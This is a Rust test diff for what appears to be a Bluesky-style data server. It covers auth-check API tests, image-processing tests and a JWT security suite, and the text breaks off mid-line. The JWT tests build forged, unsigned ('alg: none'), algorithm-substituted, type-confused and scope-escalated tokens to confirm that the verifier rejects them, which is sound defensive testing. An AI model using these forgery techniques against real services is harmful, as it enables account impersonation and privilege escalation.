··· 1 - mod common; 2 - use common::{base_url, client, create_account_and_login}; 3 - use serde_json::json; 4 - 5 - #[tokio::test] 6 - async fn test_get_timeline_requires_auth() { 7 - let client = client(); 8 - let base = base_url().await; 9 - let res = client 10 - .get(format!("{}/xrpc/app.bsky.feed.getTimeline", base)) 11 - .send() 12 - .await 13 - .unwrap(); 14 - assert_eq!(res.status(), 401); 15 - } 16 - 17 - #[tokio::test] 18 - async fn test_get_author_feed_requires_actor() { 19 - let client = client(); 20 - let base = base_url().await; 21 - let (jwt, _did) = create_account_and_login(&client).await; 22 - let res = client 23 - .get(format!("{}/xrpc/app.bsky.feed.getAuthorFeed", base)) 24 - .header("Authorization", format!("Bearer {}", jwt)) 25 - .send() 26 - .await 27 - .unwrap(); 28 - assert_eq!(res.status(), 400); 29 - } 30 - 31 - #[tokio::test] 32 - async fn test_get_actor_likes_requires_actor() { 33 - let client = client(); 34 - let base = base_url().await; 35 - let (jwt, _did) = create_account_and_login(&client).await; 36 - let res = client 37 - .get(format!("{}/xrpc/app.bsky.feed.getActorLikes", base)) 38 - .header("Authorization", format!("Bearer {}", jwt)) 39 - .send() 40 - .await 41 - .unwrap(); 42 - assert_eq!(res.status(), 400); 43 - } 44 - 45 - #[tokio::test] 46 - async fn test_get_post_thread_requires_uri() { 47 - let client = client(); 48 - let base = base_url().await; 49 - let (jwt, _did) = create_account_and_login(&client).await; 50 - let res = client 51 - .get(format!("{}/xrpc/app.bsky.feed.getPostThread", base)) 52 - .header("Authorization", format!("Bearer {}", jwt)) 53 - .send() 54 - .await 55 - .unwrap(); 56 - assert_eq!(res.status(), 400); 57 - } 58 - 59 - #[tokio::test] 60 - async fn test_get_feed_requires_auth() { 61 - let client = client(); 62 - let base = base_url().await; 63 - let res = client 64 - .get(format!( 65 - "{}/xrpc/app.bsky.feed.getFeed?feed=at://did:plc:test/app.bsky.feed.generator/test", 66 - base 67 - )) 68 - .send() 69 - .await 70 - .unwrap(); 71 - assert_eq!(res.status(), 401); 72 - } 73 - 74 - #[tokio::test] 75 - async fn test_get_feed_requires_feed_param() { 76 - let client = client(); 77 - let base = base_url().await; 78 - let (jwt, _did) = create_account_and_login(&client).await; 79 - let res = client 80 - .get(format!("{}/xrpc/app.bsky.feed.getFeed", base)) 81 - .header("Authorization", format!("Bearer {}", jwt)) 82 - .send() 83 - .await 84 - .unwrap(); 85 - assert_eq!(res.status(), 400); 86 - } 87 - 88 - #[tokio::test] 89 - async fn test_register_push_requires_auth() { 90 - let client = client(); 91 - let base = base_url().await; 92 - let res = client 93 - .post(format!("{}/xrpc/app.bsky.notification.registerPush", base)) 94 - .json(&json!({ 95 - "serviceDid": "did:web:example.com", 96 - "token": "test-token", 97 - "platform": "ios", 98 - "appId": "xyz.bsky.app" 99 - })) 100 - .send() 101 - .await 102 - .unwrap(); 103 - assert_eq!(res.status(), 401); 104 - }
···
+88 -249
tests/image_processing.rs
··· 8 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 9 let img = DynamicImage::new_rgb8(width, height); 10 let mut buf = Vec::new(); 11 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 12 - .unwrap(); 13 buf 14 } 15 16 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 17 let img = DynamicImage::new_rgb8(width, height); 18 let mut buf = Vec::new(); 19 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg) 20 - .unwrap(); 21 buf 22 } 23 24 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 25 let img = DynamicImage::new_rgb8(width, height); 26 let mut buf = Vec::new(); 27 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif) 28 - .unwrap(); 29 buf 30 } 31 32 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 33 let img = DynamicImage::new_rgb8(width, height); 34 let mut buf = Vec::new(); 35 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP) 36 - .unwrap(); 37 buf 38 } 39 40 #[test] 41 - fn test_process_png() { 42 let processor = ImageProcessor::new(); 43 - let data = create_test_png(500, 500); 44 - let result = processor.process(&data, "image/png").unwrap(); 45 assert_eq!(result.original.width, 500); 46 assert_eq!(result.original.height, 500); 47 - } 48 49 - #[test] 50 - fn test_process_jpeg() { 51 - let processor = ImageProcessor::new(); 52 - let data = create_test_jpeg(400, 300); 53 - let result = processor.process(&data, "image/jpeg").unwrap(); 54 assert_eq!(result.original.width, 400); 55 assert_eq!(result.original.height, 300); 56 - } 57 58 - #[test] 59 - fn test_process_gif() { 60 - let processor = ImageProcessor::new(); 61 - let data = create_test_gif(200, 200); 62 - let result = processor.process(&data, "image/gif").unwrap(); 63 assert_eq!(result.original.width, 200); 64 - assert_eq!(result.original.height, 200); 65 - } 66 67 - #[test] 68 - fn test_process_webp() { 69 - let processor = ImageProcessor::new(); 70 - let data = create_test_webp(300, 200); 71 - let result = processor.process(&data, "image/webp").unwrap(); 72 assert_eq!(result.original.width, 300); 73 - assert_eq!(result.original.height, 200); 74 } 75 76 #[test] 77 - fn test_thumbnail_feed_size() { 78 let processor = ImageProcessor::new(); 79 - let data = create_test_png(800, 600); 80 - let result = processor.process(&data, "image/png").unwrap(); 81 - let thumb = result 82 - .thumbnail_feed 83 - .expect("Should generate feed thumbnail for large image"); 84 - assert!(thumb.width <= THUMB_SIZE_FEED); 85 - assert!(thumb.height <= THUMB_SIZE_FEED); 86 - } 87 88 - #[test] 89 - fn test_thumbnail_full_size() { 90 - let processor = ImageProcessor::new(); 91 - let data = create_test_png(2000, 1500); 92 - let result = processor.process(&data, "image/png").unwrap(); 93 - let thumb = result 94 - .thumbnail_full 95 - .expect("Should generate full thumbnail for large image"); 96 - assert!(thumb.width <= THUMB_SIZE_FULL); 97 - assert!(thumb.height <= THUMB_SIZE_FULL); 98 - } 99 100 - #[test] 101 - fn test_no_thumbnail_small_image() { 102 - let processor = ImageProcessor::new(); 103 - let data = create_test_png(100, 100); 104 - let result = processor.process(&data, "image/png").unwrap(); 105 - assert!( 106 - result.thumbnail_feed.is_none(), 107 - "Small image should not get feed thumbnail" 108 - ); 109 - assert!( 110 - result.thumbnail_full.is_none(), 111 - "Small image should not get full thumbnail" 112 - ); 113 - } 114 115 - #[test] 116 - fn test_webp_conversion() { 117 - let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP); 118 - let data = create_test_png(300, 300); 119 - let result = processor.process(&data, "image/png").unwrap(); 120 - assert_eq!(result.original.mime_type, "image/webp"); 121 } 122 123 #[test] 124 - fn test_jpeg_output_format() { 125 - let processor = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); 126 - let data = create_test_png(300, 300); 127 - let result = processor.process(&data, "image/png").unwrap(); 128 - assert_eq!(result.original.mime_type, "image/jpeg"); 129 - } 130 131 - #[test] 132 - fn test_png_output_format() { 133 - let processor = ImageProcessor::new().with_output_format(OutputFormat::Png); 134 - let data = create_test_jpeg(300, 300); 135 - let result = processor.process(&data, "image/jpeg").unwrap(); 136 - assert_eq!(result.original.mime_type, "image/png"); 137 - } 138 139 - #[test] 140 - fn test_max_dimension_enforced() { 141 - let processor = ImageProcessor::new().with_max_dimension(1000); 142 - let data = create_test_png(2000, 2000); 143 - let result = processor.process(&data, "image/png"); 144 - assert!(matches!(result, Err(ImageError::TooLarge { .. }))); 145 - if let Err(ImageError::TooLarge { 146 - width, 147 - height, 148 - max_dimension, 149 - }) = result 150 - { 151 - assert_eq!(width, 2000); 152 - assert_eq!(height, 2000); 153 - assert_eq!(max_dimension, 1000); 154 - } 155 - } 156 157 - #[test] 158 - fn test_file_size_limit() { 159 - let processor = ImageProcessor::new().with_max_file_size(100); 160 - let data = create_test_png(500, 500); 161 - let result = processor.process(&data, "image/png"); 162 - assert!(matches!(result, Err(ImageError::FileTooLarge { .. }))); 163 - if let Err(ImageError::FileTooLarge { size, max_size }) = result { 164 - assert!(size > 100); 165 - assert_eq!(max_size, 100); 166 - } 167 } 168 169 #[test] 170 - fn test_default_max_file_size() { 171 assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024); 172 } 173 174 #[test] 175 - fn test_unsupported_format_rejected() { 176 let processor = ImageProcessor::new(); 177 - let data = b"this is not an image"; 178 - let result = processor.process(data, "application/octet-stream"); 179 assert!(matches!(result, Err(ImageError::UnsupportedFormat(_)))); 180 - } 181 182 - #[test] 183 - fn test_corrupted_image_handling() { 184 - let processor = ImageProcessor::new(); 185 - let data = b"\x89PNG\r\n\x1a\ncorrupted data here"; 186 - let result = processor.process(data, "image/png"); 187 assert!(matches!(result, Err(ImageError::DecodeError(_)))); 188 } 189 190 #[test] 191 - fn test_aspect_ratio_preserved_landscape() { 192 let processor = ImageProcessor::new(); 193 - let data = create_test_png(1600, 800); 194 - let result = processor.process(&data, "image/png").unwrap(); 195 - let thumb = result.thumbnail_full.expect("Should have thumbnail"); 196 let original_ratio = 1600.0 / 800.0; 197 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 198 - assert!( 199 - (original_ratio - thumb_ratio).abs() < 0.1, 200 - "Aspect ratio should be preserved" 201 - ); 202 - } 203 204 - #[test] 205 - fn test_aspect_ratio_preserved_portrait() { 206 - let processor = ImageProcessor::new(); 207 - let data = create_test_png(800, 1600); 208 - let result = processor.process(&data, "image/png").unwrap(); 209 - let thumb = result.thumbnail_full.expect("Should have thumbnail"); 210 let original_ratio = 800.0 / 1600.0; 211 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 212 - assert!( 213 - (original_ratio - thumb_ratio).abs() < 0.1, 214 - "Aspect ratio should be preserved" 215 - ); 216 } 217 218 #[test] 219 - fn test_mime_type_detection_auto() { 220 - let processor = ImageProcessor::new(); 221 - let data = create_test_png(100, 100); 222 - let result = processor.process(&data, "application/octet-stream"); 223 - assert!(result.is_ok(), "Should detect PNG format from data"); 224 - } 225 - 226 - #[test] 227 - fn test_is_supported_mime_type() { 228 assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); 229 assert!(ImageProcessor::is_supported_mime_type("image/jpg")); 230 assert!(ImageProcessor::is_supported_mime_type("image/png")); ··· 235 assert!(!ImageProcessor::is_supported_mime_type("image/bmp")); 236 assert!(!ImageProcessor::is_supported_mime_type("image/tiff")); 237 assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 238 - assert!(!ImageProcessor::is_supported_mime_type("application/json")); 239 - } 240 241 - #[test] 242 - fn test_strip_exif() { 243 - let data = create_test_jpeg(100, 100); 244 - let result = ImageProcessor::strip_exif(&data); 245 - assert!(result.is_ok()); 246 - let stripped = result.unwrap(); 247 - assert!(!stripped.is_empty()); 248 - } 249 250 - #[test] 251 - fn test_with_thumbnails_disabled() { 252 - let processor = ImageProcessor::new().with_thumbnails(false); 253 - let data = create_test_png(2000, 2000); 254 - let result = processor.process(&data, "image/png").unwrap(); 255 - assert!( 256 - result.thumbnail_feed.is_none(), 257 - "Thumbnails should be disabled" 258 - ); 259 - assert!( 260 - result.thumbnail_full.is_none(), 261 - "Thumbnails should be disabled" 262 - ); 263 - } 264 265 - #[test] 266 - fn test_builder_chaining() { 267 let processor = ImageProcessor::new() 268 .with_max_dimension(2048) 269 .with_max_file_size(5 * 1024 * 1024) ··· 272 let data = create_test_png(500, 500); 273 let result = processor.process(&data, "image/png").unwrap(); 274 assert_eq!(result.original.mime_type, "image/jpeg"); 275 - } 276 - 277 - #[test] 278 - fn test_processed_image_fields() { 279 - let processor = ImageProcessor::new(); 280 - let data = create_test_png(500, 500); 281 - let result = processor.process(&data, "image/png").unwrap(); 282 assert!(!result.original.data.is_empty()); 283 - assert!(!result.original.mime_type.is_empty()); 284 - assert!(result.original.width > 0); 285 - assert!(result.original.height > 0); 286 - } 287 - 288 - #[test] 289 - fn test_only_feed_thumbnail_for_medium_images() { 290 - let processor = ImageProcessor::new(); 291 - let data = create_test_png(500, 500); 292 - let result = processor.process(&data, "image/png").unwrap(); 293 - assert!( 294 - result.thumbnail_feed.is_some(), 295 - "Should have feed thumbnail" 296 - ); 297 - assert!( 298 - result.thumbnail_full.is_none(), 299 - "Should NOT have full thumbnail for 500px image" 300 - ); 301 - } 302 - 303 - #[test] 304 - fn test_both_thumbnails_for_large_images() { 305 - let processor = ImageProcessor::new(); 306 - let data = create_test_png(2000, 2000); 307 - let result = processor.process(&data, "image/png").unwrap(); 308 - assert!( 309 - result.thumbnail_feed.is_some(), 310 - "Should have feed thumbnail" 311 - ); 312 - assert!( 313 - result.thumbnail_full.is_some(), 314 - "Should have full thumbnail for 2000px image" 315 - ); 316 - } 317 - 318 - #[test] 319 - fn test_exact_threshold_boundary_feed() { 320 - let processor = ImageProcessor::new(); 321 - let at_threshold = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 322 - let result = processor.process(&at_threshold, "image/png").unwrap(); 323 - assert!( 324 - result.thumbnail_feed.is_none(), 325 - "Exact threshold should not generate thumbnail" 326 - ); 327 - let above_threshold = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 328 - let result = processor.process(&above_threshold, "image/png").unwrap(); 329 - assert!( 330 - result.thumbnail_feed.is_some(), 331 - "Above threshold should generate thumbnail" 332 - ); 333 - } 334 - 335 - #[test] 336 - fn test_exact_threshold_boundary_full() { 337 - let processor = ImageProcessor::new(); 338 - let at_threshold = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 339 - let result = processor.process(&at_threshold, "image/png").unwrap(); 340 - assert!( 341 - result.thumbnail_full.is_none(), 342 - "Exact threshold should not generate thumbnail" 343 - ); 344 - let above_threshold = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 345 - let result = processor.process(&above_threshold, "image/png").unwrap(); 346 - assert!( 347 - result.thumbnail_full.is_some(), 348 - "Above threshold should generate thumbnail" 349 - ); 350 }
··· 8 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 9 let img = DynamicImage::new_rgb8(width, height); 10 let mut buf = Vec::new(); 11 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 12 buf 13 } 14 15 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 16 let img = DynamicImage::new_rgb8(width, height); 17 let mut buf = Vec::new(); 18 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 19 buf 20 } 21 22 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 23 let img = DynamicImage::new_rgb8(width, height); 24 let mut buf = Vec::new(); 25 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 26 buf 27 } 28 29 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 30 let img = DynamicImage::new_rgb8(width, height); 31 let mut buf = Vec::new(); 32 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 33 buf 34 } 35 36 #[test] 37 + fn test_format_support() { 38 let processor = ImageProcessor::new(); 39 + 40 + let png = create_test_png(500, 500); 41 + let result = processor.process(&png, "image/png").unwrap(); 42 assert_eq!(result.original.width, 500); 43 assert_eq!(result.original.height, 500); 44 45 + let jpeg = create_test_jpeg(400, 300); 46 + let result = processor.process(&jpeg, "image/jpeg").unwrap(); 47 assert_eq!(result.original.width, 400); 48 assert_eq!(result.original.height, 300); 49 50 + let gif = create_test_gif(200, 200); 51 + let result = processor.process(&gif, "image/gif").unwrap(); 52 assert_eq!(result.original.width, 200); 53 54 + let webp = create_test_webp(300, 200); 55 + let result = processor.process(&webp, "image/webp").unwrap(); 56 assert_eq!(result.original.width, 300); 57 } 58 59 #[test] 60 + fn test_thumbnail_generation() { 61 let processor = ImageProcessor::new(); 62 63 + let small = create_test_png(100, 100); 64 + let result = processor.process(&small, "image/png").unwrap(); 65 + assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 66 + assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 67 + 68 + let medium = create_test_png(500, 500); 69 + let result = processor.process(&medium, "image/png").unwrap(); 70 + assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail"); 71 + assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail"); 72 + 73 + let large = create_test_png(2000, 2000); 74 + let result = processor.process(&large, "image/png").unwrap(); 75 + assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail"); 76 + assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail"); 77 + let thumb = result.thumbnail_feed.unwrap(); 78 + assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED); 79 + let full = result.thumbnail_full.unwrap(); 80 + assert!(full.width <= THUMB_SIZE_FULL && full.height <= THUMB_SIZE_FULL); 81 + 82 + let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 83 + let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 84 + assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none()); 85 + assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some()); 86 87 + let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 88 + let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 89 + assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none()); 90 + assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some()); 91 92 + let disabled = ImageProcessor::new().with_thumbnails(false); 93 + let result = disabled.process(&large, "image/png").unwrap(); 94 + assert!(result.thumbnail_feed.is_none() && result.thumbnail_full.is_none()); 95 } 96 97 #[test] 98 + fn test_output_format_conversion() { 99 + let png = create_test_png(300, 300); 100 + let jpeg = create_test_jpeg(300, 300); 101 102 + let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP); 103 + assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp"); 104 105 + let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); 106 + assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg"); 107 108 + let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png); 109 + assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png"); 110 } 111 112 #[test] 113 + fn test_size_and_dimension_limits() { 114 assert_eq!(DEFAULT_MAX_FILE_SIZE, 10 * 1024 * 1024); 115 + 116 + let max_dim = ImageProcessor::new().with_max_dimension(1000); 117 + let large = create_test_png(2000, 2000); 118 + let result = max_dim.process(&large, "image/png"); 119 + assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 }))); 120 + 121 + let max_file = ImageProcessor::new().with_max_file_size(100); 122 + let data = create_test_png(500, 500); 123 + let result = max_file.process(&data, "image/png"); 124 + assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. }))); 125 } 126 127 #[test] 128 + fn test_error_handling() { 129 let processor = ImageProcessor::new(); 130 + 131 + let result = processor.process(b"this is not an image", "application/octet-stream"); 132 assert!(matches!(result, Err(ImageError::UnsupportedFormat(_)))); 133 134 + let result = processor.process(b"\x89PNG\r\n\x1a\ncorrupted data here", "image/png"); 135 assert!(matches!(result, Err(ImageError::DecodeError(_)))); 136 } 137 138 #[test] 139 + fn test_aspect_ratio_preservation() { 140 let processor = ImageProcessor::new(); 141 + 142 + let landscape = create_test_png(1600, 800); 143 + let result = processor.process(&landscape, "image/png").unwrap(); 144 + let thumb = result.thumbnail_full.unwrap(); 145 let original_ratio = 1600.0 / 800.0; 146 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 147 + assert!((original_ratio - thumb_ratio).abs() < 0.1); 148 149 + let portrait = create_test_png(800, 1600); 150 + let result = processor.process(&portrait, "image/png").unwrap(); 151 + let thumb = result.thumbnail_full.unwrap(); 152 let original_ratio = 800.0 / 1600.0; 153 let thumb_ratio = thumb.width as f64 / thumb.height as f64; 154 + assert!((original_ratio - thumb_ratio).abs() < 0.1); 155 } 156 157 #[test] 158 + fn test_utilities_and_builder() { 159 assert!(ImageProcessor::is_supported_mime_type("image/jpeg")); 160 assert!(ImageProcessor::is_supported_mime_type("image/jpg")); 161 assert!(ImageProcessor::is_supported_mime_type("image/png")); ··· 166 assert!(!ImageProcessor::is_supported_mime_type("image/bmp")); 167 assert!(!ImageProcessor::is_supported_mime_type("image/tiff")); 168 assert!(!ImageProcessor::is_supported_mime_type("text/plain")); 169 170 + let data = create_test_png(100, 100); 171 + let processor = ImageProcessor::new(); 172 + let result = processor.process(&data, "application/octet-stream"); 173 + assert!(result.is_ok(), "Should detect PNG format from data"); 174 175 + let jpeg = create_test_jpeg(100, 100); 176 + let stripped = ImageProcessor::strip_exif(&jpeg).unwrap(); 177 + assert!(!stripped.is_empty()); 178 179 let processor = ImageProcessor::new() 180 .with_max_dimension(2048) 181 .with_max_file_size(5 * 1024 * 1024) ··· 184 let data = create_test_png(500, 500); 185 let result = processor.process(&data, "image/png").unwrap(); 186 assert_eq!(result.original.mime_type, "image/jpeg"); 187 assert!(!result.original.data.is_empty()); 188 + assert!(result.original.width > 0 && result.original.height > 0); 189 }
+269 -839
tests/jwt_security.rs
··· 38 } 39 40 #[test] 41 - fn test_jwt_security_forged_signature_rejected() { 42 let key_bytes = generate_user_key(); 43 let did = "did:plc:test"; 44 let token = create_access_token(did, &key_bytes).expect("create token"); 45 let parts: Vec<&str> = token.split('.').collect(); 46 let forged_signature = URL_SAFE_NO_PAD.encode(&[0u8; 64]); 47 let forged_token = format!("{}.{}.{}", parts[0], parts[1], forged_signature); 48 let result = verify_access_token(&forged_token, &key_bytes); 49 assert!(result.is_err(), "Forged signature must be rejected"); 50 - let err_msg = result.err().unwrap().to_string(); 51 - assert!( 52 - err_msg.contains("signature") || err_msg.contains("Signature"), 53 - "Error should mention signature: {}", 54 - err_msg 55 - ); 56 - } 57 58 - #[test] 59 - fn test_jwt_security_modified_payload_rejected() { 60 - let key_bytes = generate_user_key(); 61 - let did = "did:plc:legitimate"; 62 - let token = create_access_token(did, &key_bytes).expect("create token"); 63 - let parts: Vec<&str> = token.split('.').collect(); 64 let payload_bytes = URL_SAFE_NO_PAD.decode(parts[1]).unwrap(); 65 let mut payload: Value = serde_json::from_slice(&payload_bytes).unwrap(); 66 payload["sub"] = json!("did:plc:attacker"); 67 let modified_payload = URL_SAFE_NO_PAD.encode(serde_json::to_string(&payload).unwrap()); 68 let modified_token = format!("{}.{}.{}", parts[0], modified_payload, parts[2]); 69 - let result = verify_access_token(&modified_token, &key_bytes); 70 - assert!(result.is_err(), "Modified payload must be rejected"); 71 } 72 73 #[test] 74 - fn test_jwt_security_algorithm_none_attack_rejected() { 75 let key_bytes = generate_user_key(); 76 let did = "did:plc:test"; 77 - let header = json!({ 78 - "alg": "none", 79 - "typ": TOKEN_TYPE_ACCESS 80 - }); 81 let claims = json!({ 82 - "iss": did, 83 - "sub": did, 84 - "aud": "did:web:test.pds", 85 - "iat": Utc::now().timestamp(), 86 - "exp": Utc::now().timestamp() + 3600, 87 - "jti": "attacker-token-1", 88 - "scope": SCOPE_ACCESS 89 }); 90 - let malicious_token = create_unsigned_jwt(&header, &claims); 91 - let result = verify_access_token(&malicious_token, &key_bytes); 92 - assert!(result.is_err(), "Algorithm 'none' attack must be rejected"); 93 - } 94 95 - #[test] 96 - fn test_jwt_security_algorithm_substitution_hs256_rejected() { 97 - let key_bytes = generate_user_key(); 98 - let did = "did:plc:test"; 99 - let header = json!({ 100 - "alg": "HS256", 101 - "typ": TOKEN_TYPE_ACCESS 102 - }); 103 - let claims = json!({ 104 - "iss": did, 105 - "sub": did, 106 - "aud": "did:web:test.pds", 107 - "iat": Utc::now().timestamp(), 108 - "exp": Utc::now().timestamp() + 3600, 109 - "jti": "attacker-token-2", 110 - "scope": SCOPE_ACCESS 111 - }); 112 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 113 let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap()); 114 use hmac::{Hmac, Mac}; 115 type HmacSha256 = Hmac<Sha256>; ··· 117 let mut mac = HmacSha256::new_from_slice(&key_bytes).unwrap(); 118 mac.update(message.as_bytes()); 119 let hmac_sig = mac.finalize().into_bytes(); 120 - let signature_b64 = URL_SAFE_NO_PAD.encode(&hmac_sig); 121 - let malicious_token = format!("{}.{}", message, signature_b64); 122 - let result = verify_access_token(&malicious_token, &key_bytes); 123 - assert!( 124 - result.is_err(), 125 - "HS256 algorithm substitution must be rejected" 126 - ); 127 - } 128 129 - #[test] 130 - fn test_jwt_security_algorithm_substitution_rs256_rejected() { 131 - let key_bytes = generate_user_key(); 132 - let did = "did:plc:test"; 133 - let header = json!({ 134 - "alg": "RS256", 135 - "typ": TOKEN_TYPE_ACCESS 136 - }); 137 - let claims = json!({ 138 - "iss": did, 139 - "sub": did, 140 - "aud": "did:web:test.pds", 141 - "iat": Utc::now().timestamp(), 142 - "exp": Utc::now().timestamp() + 3600, 143 - "jti": "attacker-token-3", 144 - "scope": SCOPE_ACCESS 145 - }); 146 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 147 - let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap()); 148 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 256]); 149 - let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 150 - let result = verify_access_token(&malicious_token, &key_bytes); 151 - assert!( 152 - result.is_err(), 153 - "RS256 algorithm substitution must be rejected" 154 - ); 155 } 156 157 #[test] 158 - fn test_jwt_security_algorithm_substitution_es256_rejected() { 159 let key_bytes = generate_user_key(); 160 let did = "did:plc:test"; 161 - let header = json!({ 162 - "alg": "ES256", 163 - "typ": TOKEN_TYPE_ACCESS 164 - }); 165 - let claims = json!({ 166 - "iss": did, 167 - "sub": did, 168 - "aud": "did:web:test.pds", 169 - "iat": Utc::now().timestamp(), 170 - "exp": Utc::now().timestamp() + 3600, 171 - "jti": "attacker-token-4", 172 - "scope": SCOPE_ACCESS 173 - }); 174 - let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&header).unwrap()); 175 - let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(&claims).unwrap()); 176 - let fake_sig = URL_SAFE_NO_PAD.encode(&[1u8; 64]); 177 - let malicious_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 178 - let result = verify_access_token(&malicious_token, &key_bytes); 179 - assert!( 180 - result.is_err(), 181 - "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)" 182 - ); 183 - } 184 185 - #[test] 186 - fn test_jwt_security_token_type_confusion_refresh_as_access() { 187 - let key_bytes = generate_user_key(); 188 - let did = "did:plc:test"; 189 let refresh_token = create_refresh_token(did, &key_bytes).expect("create refresh token"); 190 let result = verify_access_token(&refresh_token, &key_bytes); 191 - assert!( 192 - result.is_err(), 193 - "Refresh token must not be accepted as access token" 194 - ); 195 - let err_msg = result.err().unwrap().to_string(); 196 - assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 197 - } 198 199 - #[test] 200 - fn test_jwt_security_token_type_confusion_access_as_refresh() { 201 - let key_bytes = generate_user_key(); 202 - let did = "did:plc:test"; 203 let access_token = create_access_token(did, &key_bytes).expect("create access token"); 204 let result = verify_refresh_token(&access_token, &key_bytes); 205 - assert!( 206 - result.is_err(), 207 - "Access token must not be accepted as refresh token" 208 - ); 209 - let err_msg = result.err().unwrap().to_string(); 210 - assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 211 - } 212 213 - #[test] 214 - fn test_jwt_security_token_type_confusion_service_as_access() { 215 - let key_bytes = generate_user_key(); 216 - let did = "did:plc:test"; 217 - let service_token = 218 - create_service_token(did, "did:web:target", "com.example.method", &key_bytes) 219 - .expect("create service token"); 220 - let result = verify_access_token(&service_token, &key_bytes); 221 - assert!( 222 - result.is_err(), 223 - "Service token must not be accepted as access token" 224 - ); 225 } 226 227 #[test] 228 - fn test_jwt_security_scope_manipulation_attack() { 229 let key_bytes = generate_user_key(); 230 let did = "did:plc:test"; 231 - let header = json!({ 232 - "alg": "ES256K", 233 - "typ": TOKEN_TYPE_ACCESS 234 - }); 235 - let claims = json!({ 236 - "iss": did, 237 - "sub": did, 238 - "aud": "did:web:test.pds", 239 - "iat": Utc::now().timestamp(), 240 - "exp": Utc::now().timestamp() + 3600, 241 - "jti": "scope-attack-token", 242 - "scope": "admin.all" 243 - }); 244 - let malicious_token = create_custom_jwt(&header, &claims, &key_bytes); 245 - let result = verify_access_token(&malicious_token, &key_bytes); 246 - assert!(result.is_err(), "Invalid scope must be rejected"); 247 - let err_msg = result.err().unwrap().to_string(); 248 - assert!( 249 - err_msg.contains("Invalid token scope"), 250 - "Error: {}", 251 - err_msg 252 - ); 253 - } 254 255 - #[test] 256 - fn test_jwt_security_empty_scope_rejected() { 257 - let key_bytes = generate_user_key(); 258 - let did = "did:plc:test"; 259 - let header = json!({ 260 - "alg": "ES256K", 261 - "typ": TOKEN_TYPE_ACCESS 262 }); 263 - let claims = json!({ 264 - "iss": did, 265 - "sub": did, 266 - "aud": "did:web:test.pds", 267 - "iat": Utc::now().timestamp(), 268 - "exp": Utc::now().timestamp() + 3600, 269 - "jti": "empty-scope-token", 270 - "scope": "" 271 - }); 272 - let token = create_custom_jwt(&header, &claims, &key_bytes); 273 - let result = verify_access_token(&token, &key_bytes); 274 - assert!( 275 - result.is_err(), 276 - "Empty scope must be rejected for access tokens" 277 - ); 278 - } 279 280 - #[test] 281 - fn test_jwt_security_missing_scope_rejected() { 282 - let key_bytes = generate_user_key(); 283 - let did = 